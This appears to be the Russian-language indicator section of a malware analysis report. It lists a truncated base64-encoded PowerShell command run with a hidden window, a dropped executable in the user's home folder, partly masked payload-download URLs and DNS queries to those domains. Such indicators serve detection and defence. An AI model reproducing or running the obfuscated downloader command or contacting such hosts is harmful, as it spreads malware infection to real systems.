Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABxAHUAdQBhAGYAeABlAGEAcgA9ACcAagB1AG0AagB1AGEAcABoAGUAdQBwACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAdQByAGAASQBUAHkAYABwAFIAbwB0AGAAbwBDAG...
- %HOMEPATH%\842.exe
- %HOMEPATH%\842.exe
- http://fa####e-kamenz.de/WordPress_01/yoAgOp3nqs1f6s46320/
- http://fa###mgl.com/cgi-bin/UVjmD8unt9339/
- http://fi###eligure.de/Sales/nusylocbn35924659/
- http://fl####coboston.com/workshops/AqEG/
- DNS ASK fa####e-kamenz.de
- DNS ASK fa###mgl.com
- DNS ASK mi#####t66.blogspot.com
- DNS ASK fi###eligure.de
- DNS ASK ex###lly.com
- DNS ASK fl####coboston.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABxAHUAdQBhAGYAeABlAGEAcgA9ACcAagB1AG0AagB1AGEAcABoAGUAdQBwACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAdQByAGAASQBUAHkAYABwAFIAbwB0AGAAbwBDAG...' (со скрытым окном)